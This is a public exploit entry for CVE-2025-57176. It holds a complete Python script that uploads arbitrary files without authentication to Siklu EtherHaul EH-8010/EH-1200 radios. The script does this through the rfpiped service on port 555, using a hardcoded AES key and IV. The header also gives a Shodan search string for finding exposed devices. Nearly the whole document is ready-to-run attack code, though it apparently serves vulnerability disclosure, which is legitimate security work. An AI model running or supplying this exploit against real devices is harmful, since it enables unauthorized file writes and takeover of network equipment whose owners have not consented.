# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES
PORT = 555
HDR_LEN = 0x90
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])
def recv_exact(sock: socket.socket, n: int) -> bytes:
out = bytearray()
while len(out) < n:
chunk = sock.recv(n - len(out))
if not chunk:
raise ConnectionError('socket closed')
out += chunk
return bytes(out)
def pad16_zero(b: bytes) -> bytes:
r = len(b) & 0x0F
return b if r == 0 else (b + b'\x00' * (16 - r))
def hdr_checksum(hdr: bytes) -> int:
return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF
def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
hdr = bytearray(HDR_LEN)
hdr[0] = flag & 0xFF
hdr[1] = msg & 0xFF
struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
p = path if path.endswith(b'\x00') else (path + b'\x00')
max_path = HDR_LEN - 0x10
hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]
struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
return bytes(hdr)
class RFPipeSession:
def __init__(self, key: bytes, iv0: bytes):
self.key = key
self.send_iv = iv0
self.recv_iv = iv0
def enc_send(self, sock: socket.socket, data: bytes) -> None:
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
ct = cipher.encrypt(data)
self.send_iv = ct[-16:]
sock.sendall(ct)
def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
if n_plain <= 0:
return b''
n_padded = (n_plain + 15) & ~15
ct = recv_exact(sock, n_padded)
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
pt = cipher.decrypt(ct)
self.recv_iv = ct[-16:]
return pt[:n_plain]
def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
if len(hdr_plain) != HDR_LEN:
raise ValueError('header must be 0x90 bytes')
self.enc_send(sock, hdr_plain)
def recv_header(self, sock: socket.socket) -> bytes:
ct = recv_exact(sock, HDR_LEN)
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
pt = cipher.decrypt(ct)
self.recv_iv = ct[-16:]
return pt
def connect_any(host: str, port: int) -> socket.socket:
infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
last_err = None
for fam, st, proto, _, sa in infos:
s = socket.socket(fam, st, proto)
try:
s.connect(sa)
return s
except Exception as e:
last_err = e
s.close()
raise ConnectionError(f'connect failed: {last_err}')
def main():
ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
ap.add_argument('target', help='IPv4/IPv6 address')
ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
ap.add_argument('--file', required=True, help='local file to send as payload')
ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
args = ap.parse_args()
with open(args.file, 'rb') as f:
payload = f.read()
path_bytes = args.path.encode('utf-8')
hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)
sess = RFPipeSession(KEY, IV0)
with connect_any(args.target, PORT) as s:
sess.send_header(s, hdr_plain)
if payload:
sess.enc_send(s, pad16_zero(payload))
if args.recv:
rh = sess.recv_header(s)
flag = rh[0]; rmsg = rh[1]
rlen = struct.unpack_from('<I', rh, 0x08)[0]
print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
if rmsg in (0x03, 0x05):
return
if rlen:
body = sess.dec_recv(s, rlen)
if body.endswith(b'\x00'):
body = body[:-1]
try:
print(body.decode('utf-8', errors='replace'))
except Exception:
print(body.hex())
if __name__ == '__main__':
main()